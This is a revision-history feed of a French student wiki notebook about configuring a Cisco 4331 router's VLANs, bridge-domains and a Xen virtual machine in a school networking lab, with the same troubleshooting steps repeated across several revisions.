La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34837</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34837"/>
				<updated>2016-10-24T19:53:03Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Présentation du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (14/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34836</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34836"/>
				<updated>2016-10-24T19:23:31Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Répartition du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (14/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
